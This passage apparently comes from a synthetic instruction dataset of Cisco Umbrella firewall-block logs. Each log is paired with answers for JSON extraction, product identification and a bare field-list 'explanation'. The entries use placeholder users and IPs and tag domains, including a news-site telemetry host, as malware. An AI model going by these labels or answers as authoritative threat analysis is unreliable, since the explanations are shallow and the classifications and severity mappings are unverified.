"message": "WitFoo-Artifact ::: fqdn=pushclk-10416.com ::: action=BLOCKED ::: message={\"originId\":600808038,\"originType\":\"Network Devices\",\"internalIp\":\"176.7.198.1\",\"externalIp\":\"28.145.115.161\",\"categories\":[\"Advertisements\",\"Malware\",\"Phishing\"],\"tags\":[],\"destination\":\"pushclk-10416.com\",\"originLabel\":\"bob\",\"actionTaken\":\"BLOCKED\",\"datetime\":\"2023-05-18T20:29:12.000Z\"} ::: clientIP=176.7.198.1 ::: serverIP=28.145.115.161 ::: userName=bob ::: created_at=2023-05-18T20:29:12.000Z ::: streamName=OpenDNS Detection ::: vendorCode=AdvertisementsMalwarePhishing ::: messageType=firewall_action ::: pipelineName=OpenDNS Detection ::: severityCode=2 ::: startTimeUTC=2023-05-18T20:29:12.000Z ::: serverHostname=pushclk-10416.com ::: pipelineEntrypoint=dispatch",
"messagetype": "firewall_action",
"productids": [
38
],
"senderhost": "kafka.precinct",
"sensitivity": "normal",
"serverhostname": "pushclk-10416.com",
"severitycode": 2,
"severitylabel": "critical",
"sourceinfo": "unknown",
"starttimeutc": "2023-05-18T20:29:12.000Z",
"tags": [
"OpenDNS Detection",
"firewall_action"
],
"vendorcode": "AdvertisementsMalwarePhishing",
"streamName": "OpenDNS Detection",
"clientIP": "176.7.198.1",
"serverIP": "28.145.115.161",
"userName": "bob"
} | Create a JSON artifact from the message |
WitFoo-Artifact ::: fqdn=pushclk-10416.com ::: action=BLOCKED ::: message={"originId":600808038,"originType":"Network Devices","internalIp":"176.7.198.1","externalIp":"28.145.115.161","categories":["Advertisements","Malware","Phishing"],"tags":[],"destination":"pushclk-10416.com","originLabel":"bob","actionTaken":"BLOCKED","datetime":"2023-05-18T20:29:12.000Z"} ::: clientIP=176.7.198.1 ::: serverIP=28.145.115.161 ::: userName=bob ::: created_at=2023-05-18T20:29:12.000Z ::: streamName=OpenDNS Detection ::: vendorCode=AdvertisementsMalwarePhishing ::: messageType=firewall_action ::: pipelineName=OpenDNS Detection ::: severityCode=2 ::: startTimeUTC=2023-05-18T20:29:12.000Z ::: serverHostname=pushclk-10416.com ::: pipelineEntrypoint=dispatch | Product: Umbrella
Vendor: Cisco | Identify this syslog message |
WitFoo-Artifact ::: fqdn=pushclk-10416.com ::: action=BLOCKED ::: message={"originId":600808038,"originType":"Network Devices","internalIp":"176.7.198.1","externalIp":"28.145.115.161","categories":["Advertisements","Malware","Phishing"],"tags":[],"destination":"pushclk-10416.com","originLabel":"bob","actionTaken":"BLOCKED","datetime":"2023-05-18T20:29:12.000Z"} ::: clientIP=176.7.198.1 ::: serverIP=28.145.115.161 ::: userName=bob ::: created_at=2023-05-18T20:29:12.000Z ::: streamName=OpenDNS Detection ::: vendorCode=AdvertisementsMalwarePhishing ::: messageType=firewall_action ::: pipelineName=OpenDNS Detection ::: severityCode=2 ::: startTimeUTC=2023-05-18T20:29:12.000Z ::: serverHostname=pushclk-10416.com ::: pipelineEntrypoint=dispatch | This is a syslog message from a product called Umbrella by Cisco. The following fields were extracted from the message:
action: block
fqdn: pushclk-10416.com
messagetype: firewall_action
productids: [38]
senderhost: kafka.precinct
sensitivity: normal
serverhostname: pushclk-10416.com
severitycode: 2
severitylabel: critical
sourceinfo: unknown
starttimeutc: 2023-05-18T20:29:12.000Z
tags: ['OpenDNS Detection', 'firewall_action']
vendorcode: AdvertisementsMalwarePhishing
streamName: OpenDNS Detection
clientIP: 176.7.198.1
serverIP: 28.145.115.161
userName: bob | Explain this syslog message |
WitFoo-Artifact ::: fqdn=rum.browser-intake-foxbusiness.com ::: action=BLOCKED ::: message={"originId":600808038,"originType":"Network Devices","internalIp":"9.15.181.119","externalIp":"44.110.171.173","categories":["Malware"],"tags":[],"destination":"rum.browser-intake-foxbusiness.com","originLabel":"johndoe","actionTaken":"BLOCKED","datetime":"2023-03-30T16:39:53.000Z"} ::: clientIP=9.15.181.119 ::: serverIP=44.110.171.173 ::: userName=johndoe ::: created_at=2023-03-30T16:39:53.000Z ::: streamName=OpenDNS Detection ::: vendorCode=Malware ::: messageType=firewall_action ::: pipelineName=OpenDNS Detection ::: severityCode=2 ::: startTimeUTC=2023-03-30T16:39:53.000Z ::: serverHostname=rum.browser-intake-foxbusiness.com ::: pipelineEntrypoint=dispatch | {
"action": "block",
"fqdn": "rum.browser-intake-foxbusiness.com",
"message": "WitFoo-Artifact ::: fqdn=rum.browser-intake-foxbusiness.com ::: action=BLOCKED ::: message={\"originId\":600808038,\"originType\":\"Network Devices\",\"internalIp\":\"9.15.181.119\",\"externalIp\":\"44.110.171.173\",\"categories\":[\"Malware\"],\"tags\":[],\"destination\":\"rum.browser-intake-foxbusiness.com\",\"originLabel\":\"johndoe\",\"actionTaken\":\"BLOCKED\",\"datetime\":\"2023-03-30T16:39:53.000Z\"} ::: clientIP=9.15.181.119 ::: serverIP=44.110.171.173 ::: userName=johndoe ::: created_at=2023-03-30T16:39:53.000Z ::: streamName=OpenDNS Detection ::: vendorCode=Malware ::: messageType=firewall_action ::: pipelineName=OpenDNS Detection ::: severityCode=2 ::: startTimeUTC=2023-03-30T16:39:53.000Z ::: serverHostname=rum.browser-intake-foxbusiness.com ::: pipelineEntrypoint=dispatch",
"messagetype": "firewall_action",
"productids": [
38
],
"senderhost": "kafka.precinct",
"sensitivity": "normal",
"serverhostname": "rum.browser-intake-foxbusiness.com",
"severitycode": 2,
"severitylabel": "critical",
"sourceinfo": "unknown",
"starttimeutc": "2023-03-30T16:39:53.000Z",
"tags": [
"OpenDNS Detection",
"firewall_action"
],
"vendorcode": "Malware",
"streamName": "OpenDNS Detection",
"clientIP": "9.15.181.119",
"serverIP": "44.110.171.173",
"userName": "johndoe"
} | Create a JSON artifact from the message |
WitFoo-Artifact ::: fqdn=rum.browser-intake-foxbusiness.com ::: action=BLOCKED ::: message={"originId":600808038,"originType":"Network Devices","internalIp":"9.15.181.119","externalIp":"44.110.171.173","categories":["Malware"],"tags":[],"destination":"rum.browser-intake-foxbusiness.com","originLabel":"johndoe","actionTaken":"BLOCKED","datetime":"2023-03-30T16:39:53.000Z"} ::: clientIP=9.15.181.119 ::: serverIP=44.110.171.173 ::: userName=johndoe ::: created_at=2023-03-30T16:39:53.000Z ::: streamName=OpenDNS Detection ::: vendorCode=Malware ::: messageType=firewall_action ::: pipelineName=OpenDNS Detection ::: severityCode=2 ::: startTimeUTC=2023-03-30T16:39:53.000Z ::: serverHostname=rum.browser-intake-foxbusiness.com ::: pipelineEntrypoint=dispatch | Product: Umbrella
Vendor: Cisco | Identify this syslog message |
WitFoo-Artifact ::: fqdn=rum.browser-intake-foxbusiness.com ::: action=BLOCKED ::: message={"originId":600808038,"originType":"Network Devices","internalIp":"9.15.181.119","externalIp":"44.110.171.173","categories":["Malware"],"tags":[],"destination":"rum.browser-intake-foxbusiness.com","originLabel":"johndoe","actionTaken":"BLOCKED","datetime":"2023-03-30T16:39:53.000Z"} ::: clientIP=9.15.181.119 ::: serverIP=44.110.171.173 ::: userName=johndoe ::: created_at=2023-03-30T16:39:53.000Z ::: streamName=OpenDNS Detection ::: vendorCode=Malware ::: messageType=firewall_action ::: pipelineName=OpenDNS Detection ::: severityCode=2 ::: startTimeUTC=2023-03-30T16:39:53.000Z ::: serverHostname=rum.browser-intake-foxbusiness.com ::: pipelineEntrypoint=dispatch | This is a syslog message from a product called Umbrella by Cisco. The following fields were extracted from the message:
action: block
fqdn: rum.browser-intake-foxbusiness.com
messagetype: firewall_action
productids: [38]
senderhost: kafka.precinct
sensitivity: normal
serverhostname: rum.browser-intake-foxbusiness.com
severitycode: 2
severitylabel: critical
sourceinfo: unknown
starttimeutc: 2023-03-30T16:39:53.000Z
tags: ['OpenDNS Detection', 'firewall_action']
vendorcode: Malware
streamName: OpenDNS Detection
clientIP: 9.15.181.119
serverIP: 44.110.171.173
userName: johndoe | Explain this syslog message |
WitFoo-Artifact ::: fqdn=rum.browser-intake-foxbusiness.com ::: action=BLOCKED ::: message={"originId":600808038,"originType":"Network Devices","internalIp":"71.41.77.34","externalIp":"246.213.220.140","categories":["Malware"],"tags":[],"destination":"rum.browser-intake-foxbusiness.com","originLabel":"alice","actionTaken":"BLOCKED","datetime":"2023-03-30T16:39:53.000Z"} ::: clientIP=71.41.77.34 ::: serverIP=246.213.220.140 ::: userName=alice ::: created_at=2023-03-30T16:39:53.000Z ::: streamName=OpenDNS Detection ::: vendorCode=Malware ::: messageType=firewall_action ::: pipelineName=OpenDNS Detection ::: severityCode=2 ::: startTimeUTC=2023-03-30T16:39:53.000Z ::: serverHostname=rum.browser-intake-foxbusiness.com ::: pipelineEntrypoint=dispatch | {
"action": "block",
"fqdn": "rum.browser-intake-foxbusiness.com",
"message": "WitFoo-Artifact ::: fqdn=rum.browser-intake-foxbusiness.com ::: action=BLOCKED ::: message={\"originId\":600808038,\"originType\":\"Network Devices\",\"internalIp\":\"71.41.77.34\",\"externalIp\":\"246.213.220.140\",\"categories\":[\"Malware\"],\"tags\":[],\"destination\":\"rum.browser-intake-foxbusiness.com\",\"originLabel\":\"alice\",\"actionTaken\":\"BLOCKED\",\"datetime\":\"2023-03-30T16:39:53.000Z\"} ::: clientIP=71.41.77.34 ::: serverIP=246.213.220.140 ::: userName=alice ::: created_at=2023-03-30T16:39:53.000Z ::: streamName=OpenDNS Detection ::: vendorCode=Malware ::: messageType=firewall_action ::: pipelineName=OpenDNS Detection ::: severityCode=2 ::: startTimeUTC=2023-03-30T16:39:53.000Z ::: serverHostname=rum.browser-intake-foxbusiness.com ::: pipelineEntrypoint=dispatch",
"messagetype": "firewall_action",
"productids": [
38
],
"senderhost": "kafka.precinct",
"sensitivity": "normal",
"serverhostname": "rum.browser-intake-foxbusiness.com",
"severitycode": 2,
"severitylabel": "critical",
"sourceinfo": "unknown",
"starttimeutc": "2023-03-30T16:39:53.000Z",
"tags": [
"OpenDNS Detection",
"firewall_action"
],
"vendorcode": "Malware",
"streamName": "OpenDNS Detection",
"clientIP": "71.41.77.34",
"serverIP": "246.213.220.140",
"userName": "alice"
} | Create a JSON artifact from the message |
WitFoo-Artifact ::: fqdn=rum.browser-intake-foxbusiness.com ::: action=BLOCKED ::: message={"originId":600808038,"originType":"Network Devices","internalIp":"71.41.77.34","externalIp":"246.213.220.140","categories":["Malware"],"tags":[],"destination":"rum.browser-intake-foxbusiness.com","originLabel":"alice","actionTaken":"BLOCKED","datetime":"2023-03-30T16:39:53.000Z"} ::: clientIP=71.41.77.34 ::: serverIP=246.213.220.140 ::: userName=alice ::: created_at=2023-03-30T16:39:53.000Z ::: streamName=OpenDNS Detection ::: vendorCode=Malware ::: messageType=firewall_action ::: pipelineName=OpenDNS Detection ::: severityCode=2 ::: startTimeUTC=2023-03-30T16:39:53.000Z ::: serverHostname=rum.browser-intake-foxbusiness.com ::: pipelineEntrypoint=dispatch | Product: Umbrella
Vendor: Cisco | Identify this syslog message |
WitFoo-Artifact ::: fqdn=rum.browser-intake-foxbusiness.com ::: action=BLOCKED ::: message={"originId":600808038,"originType":"Network Devices","internalIp":"71.41.77.34","externalIp":"246.213.220.140","categories":["Malware"],"tags":[],"destination":"rum.browser-intake-foxbusiness.com","originLabel":"alice","actionTaken":"BLOCKED","datetime":"2023-03-30T16:39:53.000Z"} ::: clientIP=71.41.77.34 ::: serverIP=246.213.220.140 ::: userName=alice ::: created_at=2023-03-30T16:39:53.000Z ::: streamName=OpenDNS Detection ::: vendorCode=Malware ::: messageType=firewall_action ::: pipelineName=OpenDNS Detection ::: severityCode=2 ::: startTimeUTC=2023-03-30T16:39:53.000Z ::: serverHostname=rum.browser-intake-foxbusiness.com ::: pipelineEntrypoint=dispatch | This is a syslog message from a product called Umbrella by Cisco. The following fields were extracted from the message:
action: block
fqdn: rum.browser-intake-foxbusiness.com
messagetype: firewall_action
productids: [38]
senderhost: kafka.precinct
sensitivity: normal
serverhostname: rum.browser-intake-foxbusiness.com
severitycode: 2
severitylabel: critical
sourceinfo: unknown
starttimeutc: 2023-03-30T16:39:53.000Z
tags: ['OpenDNS Detection', 'firewall_action']
vendorcode: Malware
streamName: OpenDNS Detection
clientIP: 71.41.77.34
serverIP: 246.213.220.140
userName: alice | Explain this syslog message |
WitFoo-Artifact ::: fqdn=pushclk-10416.com ::: action=BLOCKED ::: message={"originId":600808038,"originType":"Network Devices","internalIp":"113.162.30.150","externalIp":"184.110.38.220","categories":["Advertisements","Malware","Phishing"],"tags":[],"destination":"pushclk-10416.com","originLabel":"fish","actionTaken":"BLOCKED","datetime":"2023-05-17T14:43:12.000Z"} ::: clientIP=113.162.30.150 ::: serverIP=184.110.38.220 ::: userName=fish ::: created_at=2023-05-17T14:43:12.000Z ::: streamName=OpenDNS Detection ::: vendorCode=AdvertisementsMalwarePhishing ::: messageType=firewall_action ::: pipelineName=OpenDNS Detection ::: severityCode=2 ::: startTimeUTC=2023-05-17T14:43:12.000Z ::: serverHostname=pushclk-10416.com ::: pipelineEntrypoint=dispatch | {
"action": "block",
"fqdn": "pushclk-10416.com",
"message": "WitFoo-Artifact ::: fqdn=pushclk-10416.com ::: action=BLOCKED ::: message={\"originId\":600808038,\"originType\":\"Network Devices\",\"internalIp\":\"113.162.30.150\",\"externalIp\":\"184.110.38.220\",\"categories\":[\"Advertisements\",\"Malware\",\"Phishing\"],\"tags\":[],\"destination\":\"pushclk-10416.com\",\"originLabel\":\"fish\",\"actionTaken\":\"BLOCKED\",\"datetime\":\"2023-05-17T14:43:12.000Z\"} ::: clientIP=113.162.30.150 ::: serverIP=184.110.38.220 ::: userName=fish ::: created_at=2023-05-17T14:43:12.000Z ::: streamName=OpenDNS Detection ::: vendorCode=AdvertisementsMalwarePhishing ::: messageType=firewall_action ::: pipelineName=OpenDNS Detection ::: severityCode=2 ::: startTimeUTC=2023-05-17T14:43:12.000Z ::: serverHostname=pushclk-10416.com ::: pipelineEntrypoint=dispatch",
"messagetype": "firewall_action",
"productids": [
38
],
"senderhost": "kafka.precinct",
"sensitivity": "normal",
"serverhostname": "pushclk-10416.com",
"severitycode": 2,
"severitylabel": "critical",
"sourceinfo": "unknown",
"starttimeutc": "2023-05-17T14:43:12.000Z",
"tags": [
"OpenDNS Detection",
"firewall_action"
],
"vendorcode": "AdvertisementsMalwarePhishing",
"streamName": "OpenDNS Detection",
"clientIP": "113.162.30.150",
"serverIP": "184.110.38.220",
"userName": "fish"
} | Create a JSON artifact from the message |
WitFoo-Artifact ::: fqdn=pushclk-10416.com ::: action=BLOCKED ::: message={"originId":600808038,"originType":"Network Devices","internalIp":"113.162.30.150","externalIp":"184.110.38.220","categories":["Advertisements","Malware","Phishing"],"tags":[],"destination":"pushclk-10416.com","originLabel":"fish","actionTaken":"BLOCKED","datetime":"2023-05-17T14:43:12.000Z"} ::: clientIP=113.162.30.150 ::: serverIP=184.110.38.220 ::: userName=fish ::: created_at=2023-05-17T14:43:12.000Z ::: streamName=OpenDNS Detection ::: vendorCode=AdvertisementsMalwarePhishing ::: messageType=firewall_action ::: pipelineName=OpenDNS Detection ::: severityCode=2 ::: startTimeUTC=2023-05-17T14:43:12.000Z ::: serverHostname=pushclk-10416.com ::: pipelineEntrypoint=dispatch | Product: Umbrella
Vendor: Cisco | Identify this syslog message |
WitFoo-Artifact ::: fqdn=pushclk-10416.com ::: action=BLOCKED ::: message={"originId":600808038,"originType":"Network Devices","internalIp":"113.162.30.150","externalIp":"184.110.38.220","categories":["Advertisements","Malware","Phishing"],"tags":[],"destination":"pushclk-10416.com","originLabel":"fish","actionTaken":"BLOCKED","datetime":"2023-05-17T14:43:12.000Z"} ::: clientIP=113.162.30.150 ::: serverIP=184.110.38.220 ::: userName=fish ::: created_at=2023-05-17T14:43:12.000Z ::: streamName=OpenDNS Detection ::: vendorCode=AdvertisementsMalwarePhishing ::: messageType=firewall_action ::: pipelineName=OpenDNS Detection ::: severityCode=2 ::: startTimeUTC=2023-05-17T14:43:12.000Z ::: serverHostname=pushclk-10416.com ::: pipelineEntrypoint=dispatch | This is a syslog message from a product called Umbrella by Cisco. The following fields were extracted from the message:
action: block
fqdn: pushclk-10416.com
messagetype: firewall_action
productids: [38]
senderhost: kafka.precinct
sensitivity: normal
serverhostname: pushclk-10416.com
severitycode: 2
severitylabel: critical
sourceinfo: unknown
starttimeutc: 2023-05-17T14:43:12.000Z
tags: ['OpenDNS Detection', 'firewall_action']
vendorcode: AdvertisementsMalwarePhishing
streamName: OpenDNS Detection
clientIP: 113.162.30.150
serverIP: 184.110.38.220
userName: fish | Explain this syslog message |
WitFoo-Artifact ::: fqdn=pushclk-10416.com ::: action=BLOCKED ::: message={"originId":600808038,"originType":"Network Devices","internalIp":"198.72.35.145","externalIp":"192.105.179.88","categories":["Advertisements","Malware","Phishing"],"tags":[],"destination":"pushclk-10416.com","originLabel":"fish","actionTaken":"BLOCKED","datetime":"2023-05-17T14:43:12.000Z"} ::: clientIP=198.72.35.145 ::: serverIP=192.105.179.88 ::: userName=fish ::: created_at=2023-05-17T14:43:12.000Z ::: streamName=OpenDNS Detection ::: vendorCode=AdvertisementsMalwarePhishing ::: messageType=firewall_action ::: pipelineName=OpenDNS Detection ::: severityCode=2 ::: startTimeUTC=2023-05-17T14:43:12.000Z ::: serverHostname=pushclk-10416.com ::: pipelineEntrypoint=dispatch | {
"action": "block",
"fqdn": "pushclk-10416.com",
"message": "WitFoo-Artifact ::: fqdn=pushclk-10416.com ::: action=BLOCKED ::: message={\"originId\":600808038,\"originType\":\"Network Devices\",\"internalIp\":\"198.72.35.145\",\"externalIp\":\"192.105.179.88\",\"categories\":[\"Advertisements\",\"Malware\",\"Phishing\"],\"tags\":[],\"destination\":\"pushclk-10416.com\",\"originLabel\":\"fish\",\"actionTaken\":\"BLOCKED\",\"datetime\":\"2023-05-17T14:43:12.000Z\"} ::: clientIP=198.72.35.145 ::: serverIP=192.105.179.88 ::: userName=fish ::: created_at=2023-05-17T14:43:12.000Z ::: streamName=OpenDNS Detection ::: vendorCode=AdvertisementsMalwarePhishing ::: messageType=firewall_action ::: pipelineName=OpenDNS Detection ::: severityCode=2 ::: startTimeUTC=2023-05-17T14:43:12.000Z ::: serverHostname=pushclk-10416.com ::: pipelineEntrypoint=dispatch",
"messagetype": "firewall_action",
"productids": [
38
],
"senderhost": "kafka.precinct",
"sensitivity": "normal",
"serverhostname": "pushclk-10416.com",
"severitycode": 2,
"severitylabel": "critical",
"sourceinfo": "unknown",
"starttimeutc": "2023-05-17T14:43:12.000Z",
"tags": [
"OpenDNS Detection",
"firewall_action"
],
"vendorcode": "AdvertisementsMalwarePhishing",
"streamName": "OpenDNS Detection",
"clientIP": "198.72.35.145",
"serverIP": "192.105.179.88",
"userName": "fish"
} | Create a JSON artifact from the message |
WitFoo-Artifact ::: fqdn=pushclk-10416.com ::: action=BLOCKED ::: message={"originId":600808038,"originType":"Network Devices","internalIp":"198.72.35.145","externalIp":"192.105.179.88","categories":["Advertisements","Malware","Phishing"],"tags":[],"destination":"pushclk-10416.com","originLabel":"fish","actionTaken":"BLOCKED","datetime":"2023-05-17T14:43:12.000Z"} ::: clientIP=198.72.35.145 ::: serverIP=192.105.179.88 ::: userName=fish ::: created_at=2023-05-17T14:43:12.000Z ::: streamName=OpenDNS Detection ::: vendorCode=AdvertisementsMalwarePhishing ::: messageType=firewall_action ::: pipelineName=OpenDNS Detection ::: severityCode=2 ::: startTimeUTC=2023-05-17T14:43:12.000Z ::: serverHostname=pushclk-10416.com ::: pipelineEntrypoint=dispatch | Product: Umbrella
Vendor: Cisco | Identify this syslog message |
WitFoo-Artifact ::: fqdn=pushclk-10416.com ::: action=BLOCKED ::: message={"originId":600808038,"originType":"Network Devices","internalIp":"198.72.35.145","externalIp":"192.105.179.88","categories":["Advertisements","Malware","Phishing"],"tags":[],"destination":"pushclk-10416.com","originLabel":"fish","actionTaken":"BLOCKED","datetime":"2023-05-17T14:43:12.000Z"} ::: clientIP=198.72.35.145 ::: serverIP=192.105.179.88 ::: userName=fish ::: created_at=2023-05-17T14:43:12.000Z ::: streamName=OpenDNS Detection ::: vendorCode=AdvertisementsMalwarePhishing ::: messageType=firewall_action ::: pipelineName=OpenDNS Detection ::: severityCode=2 ::: startTimeUTC=2023-05-17T14:43:12.000Z ::: serverHostname=pushclk-10416.com ::: pipelineEntrypoint=dispatch | This is a syslog message from a product called Umbrella by Cisco. The following fields were extracted from the message:
action: block
fqdn: pushclk-10416.com
messagetype: firewall_action
productids: [38]
senderhost: kafka.precinct
sensitivity: normal
serverhostname: pushclk-10416.com
severitycode: 2
severitylabel: critical
sourceinfo: unknown
starttimeutc: 2023-05-17T14:43:12.000Z
tags: ['OpenDNS Detection', 'firewall_action']
vendorcode: AdvertisementsMalwarePhishing
streamName: OpenDNS Detection
clientIP: 198.72.35.145
serverIP: 192.105.179.88
userName: fish | Explain this syslog message |
WitFoo-Artifact ::: fqdn=pushclk-10416.com ::: action=BLOCKED ::: message={"originId":600808038,"originType":"Network Devices","internalIp":"220.136.212.131","externalIp":"191.177.194.114","categories":["Advertisements","Malware","Phishing"],"tags":[],"destination":"pushclk-10416.com","originLabel":"charlie","actionTaken":"BLOCKED","datetime":"2023-05-18T16:28:22.000Z"} ::: clientIP=220.136.212.131 ::: serverIP=191.177.194.114 ::: userName=charlie ::: created_at=2023-05-18T16:28:22.000Z ::: streamName=OpenDNS Detection ::: vendorCode=AdvertisementsMalwarePhishing ::: messageType=firewall_action ::: pipelineName=OpenDNS Detection ::: severityCode=2 ::: startTimeUTC=2023-05-18T16:28:22.000Z ::: serverHostname=pushclk-10416.com ::: pipelineEntrypoint=dispatch | {
"action": "block",
"fqdn": "pushclk-10416.com",
"message": "WitFoo-Artifact ::: fqdn=pushclk-10416.com ::: action=BLOCKED ::: message={\"originId\":600808038,\"originType\":\"Network Devices\",\"internalIp\":\"220.136.212.131\",\"externalIp\":\"191.177.194.114\",\"categories\":[\"Advertisements\",\"Malware\",\"Phishing\"],\"tags\":[],\"destination\":\"pushclk-10416.com\",\"originLabel\":\"charlie\",\"actionTaken\":\"BLOCKED\",\"datetime\":\"2023-05-18T16:28:22.000Z\"} ::: clientIP=220.136.212.131 ::: serverIP=191.177.194.114 ::: userName=charlie ::: created_at=2023-05-18T16:28:22.000Z ::: streamName=OpenDNS Detection ::: vendorCode=AdvertisementsMalwarePhishing ::: messageType=firewall_action ::: pipelineName=OpenDNS Detection ::: severityCode=2 ::: startTimeUTC=2023-05-18T16:28:22.000Z ::: serverHostname=pushclk-10416.com ::: pipelineEntrypoint=dispatch",
"messagetype": "firewall_action",
"productids": [
38
],
"senderhost": "kafka.precinct",
"sensitivity": "normal",
"serverhostname": "pushclk-10416.com",
"severitycode": 2,
"severitylabel": "critical",
"sourceinfo": "unknown",
"starttimeutc": "2023-05-18T16:28:22.000Z",
"tags": [
"OpenDNS Detection",
"firewall_action"
],
"vendorcode": "AdvertisementsMalwarePhishing",
"streamName": "OpenDNS Detection",
"clientIP": "220.136.212.131",
"serverIP": "191.177.194.114",
"userName": "charlie"
} | Create a JSON artifact from the message |
WitFoo-Artifact ::: fqdn=pushclk-10416.com ::: action=BLOCKED ::: message={"originId":600808038,"originType":"Network Devices","internalIp":"220.136.212.131","externalIp":"191.177.194.114","categories":["Advertisements","Malware","Phishing"],"tags":[],"destination":"pushclk-10416.com","originLabel":"charlie","actionTaken":"BLOCKED","datetime":"2023-05-18T16:28:22.000Z"} ::: clientIP=220.136.212.131 ::: serverIP=191.177.194.114 ::: userName=charlie ::: created_at=2023-05-18T16:28:22.000Z ::: streamName=OpenDNS Detection ::: vendorCode=AdvertisementsMalwarePhishing ::: messageType=firewall_action ::: pipelineName=OpenDNS Detection ::: severityCode=2 ::: startTimeUTC=2023-05-18T16:28:22.000Z ::: serverHostname=pushclk-10416.com ::: pipelineEntrypoint=dispatch | Product: Umbrella
Vendor: Cisco | Identify this syslog message |
WitFoo-Artifact ::: fqdn=pushclk-10416.com ::: action=BLOCKED ::: message={"originId":600808038,"originType":"Network Devices","internalIp":"220.136.212.131","externalIp":"191.177.194.114","categories":["Advertisements","Malware","Phishing"],"tags":[],"destination":"pushclk-10416.com","originLabel":"charlie","actionTaken":"BLOCKED","datetime":"2023-05-18T16:28:22.000Z"} ::: clientIP=220.136.212.131 ::: serverIP=191.177.194.114 ::: userName=charlie ::: created_at=2023-05-18T16:28:22.000Z ::: streamName=OpenDNS Detection ::: vendorCode=AdvertisementsMalwarePhishing ::: messageType=firewall_action ::: pipelineName=OpenDNS Detection ::: severityCode=2 ::: startTimeUTC=2023-05-18T16:28:22.000Z ::: serverHostname=pushclk-10416.com ::: pipelineEntrypoint=dispatch | This is a syslog message from a product called Umbrella by Cisco. The following fields were extracted from the message:
action: block
fqdn: pushclk-10416.com
messagetype: firewall_action
productids: [38]
senderhost: kafka.precinct
sensitivity: normal
serverhostname: pushclk-10416.com
severitycode: 2
severitylabel: critical
sourceinfo: unknown
starttimeutc: 2023-05-18T16:28:22.000Z
tags: ['OpenDNS Detection', 'firewall_action']
vendorcode: AdvertisementsMalwarePhishing
streamName: OpenDNS Detection
clientIP: 220.136.212.131
serverIP: 191.177.194.114
userName: charlie | Explain this syslog message |
WitFoo-Artifact ::: fqdn=pushclk-10416.com ::: action=BLOCKED ::: message={"originId":600808038,"originType":"Network Devices","internalIp":"250.91.177.51","externalIp":"119.89.193.209","categories":["Advertisements","Malware","Phishing"],"tags":[],"destination":"pushclk-10416.com","originLabel":"fish","actionTaken":"BLOCKED","datetime":"2023-05-18T16:28:22.000Z"} ::: clientIP=250.91.177.51 ::: serverIP=119.89.193.209 ::: userName=fish ::: created_at=2023-05-18T16:28:22.000Z ::: streamName=OpenDNS Detection ::: vendorCode=AdvertisementsMalwarePhishing ::: messageType=firewall_action ::: pipelineName=OpenDNS Detection ::: severityCode=2 ::: startTimeUTC=2023-05-18T16:28:22.000Z ::: serverHostname=pushclk-10416.com ::: pipelineEntrypoint=dispatch | {
"action": "block",
"fqdn": "pushclk-10416.com",
"message": "WitFoo-Artifact ::: fqdn=pushclk-10416.com ::: action=BLOCKED ::: message={\"originId\":600808038,\"originType\":\"Network Devices\",\"internalIp\":\"250.91.177.51\",\"externalIp\":\"119.89.193.209\",\"categories\":[\"Advertisements\",\"Malware\",\"Phishing\"],\"tags\":[],\"destination\":\"pushclk-10416.com\",\"originLabel\":\"fish\",\"actionTaken\":\"BLOCKED\",\"datetime\":\"2023-05-18T16:28:22.000Z\"} ::: clientIP=250.91.177.51 ::: serverIP=119.89.193.209 ::: userName=fish ::: created_at=2023-05-18T16:28:22.000Z ::: streamName=OpenDNS Detection ::: vendorCode=AdvertisementsMalwarePhishing ::: messageType=firewall_action ::: pipelineName=OpenDNS Detection ::: severityCode=2 ::: startTimeUTC=2023-05-18T16:28:22.000Z ::: serverHostname=pushclk-10416.com ::: pipelineEntrypoint=dispatch",
"messagetype": "firewall_action",
"productids": [
38
],
"senderhost": "kafka.precinct",
"sensitivity": "normal",
"serverhostname": "pushclk-10416.com",
"severitycode": 2,
"severitylabel": "critical",
"sourceinfo": "unknown",
"starttimeutc": "2023-05-18T16:28:22.000Z",
"tags": [
"OpenDNS Detection",
"firewall_action"
],
"vendorcode": "AdvertisementsMalwarePhishing",
"streamName": "OpenDNS Detection",
"clientIP": "250.91.177.51",
"serverIP": "119.89.193.209",
"userName": "fish"
} | Create a JSON artifact from the message |
WitFoo-Artifact ::: fqdn=pushclk-10416.com ::: action=BLOCKED ::: message={"originId":600808038,"originType":"Network Devices","internalIp":"250.91.177.51","externalIp":"119.89.193.209","categories":["Advertisements","Malware","Phishing"],"tags":[],"destination":"pushclk-10416.com","originLabel":"fish","actionTaken":"BLOCKED","datetime":"2023-05-18T16:28:22.000Z"} ::: clientIP=250.91.177.51 ::: serverIP=119.89.193.209 ::: userName=fish ::: created_at=2023-05-18T16:28:22.000Z ::: streamName=OpenDNS Detection ::: vendorCode=AdvertisementsMalwarePhishing ::: messageType=firewall_action ::: pipelineName=OpenDNS Detection ::: severityCode=2 ::: startTimeUTC=2023-05-18T16:28:22.000Z ::: serverHostname=pushclk-10416.com ::: pipelineEntrypoint=dispatch | Product: Umbrella
Vendor: Cisco | Identify this syslog message |
WitFoo-Artifact ::: fqdn=pushclk-10416.com ::: action=BLOCKED ::: message={"originId":600808038,"originType":"Network Devices","internalIp":"250.91.177.51","externalIp":"119.89.193.209","categories":["Advertisements","Malware","Phishing"],"tags":[],"destination":"pushclk-10416.com","originLabel":"fish","actionTaken":"BLOCKED","datetime":"2023-05-18T16:28:22.000Z"} ::: clientIP=250.91.177.51 ::: serverIP=119.89.193.209 ::: userName=fish ::: created_at=2023-05-18T16:28:22.000Z ::: streamName=OpenDNS Detection ::: vendorCode=AdvertisementsMalwarePhishing ::: messageType=firewall_action ::: pipelineName=OpenDNS Detection ::: severityCode=2 ::: startTimeUTC=2023-05-18T16:28:22.000Z ::: serverHostname=pushclk-10416.com ::: pipelineEntrypoint=dispatch | This is a syslog message from a product called Umbrella by Cisco. The following fields were extracted from the message:
action: block
fqdn: pushclk-10416.com
messagetype: firewall_action
productids: [38]
senderhost: kafka.precinct
sensitivity: normal
serverhostname: pushclk-10416.com
severitycode: 2
severitylabel: critical
sourceinfo: unknown
starttimeutc: 2023-05-18T16:28:22.000Z
tags: ['OpenDNS Detection', 'firewall_action']
vendorcode: AdvertisementsMalwarePhishing
streamName: OpenDNS Detection
clientIP: 250.91.177.51
serverIP: 119.89.193.209
userName: fish | Explain this syslog message |
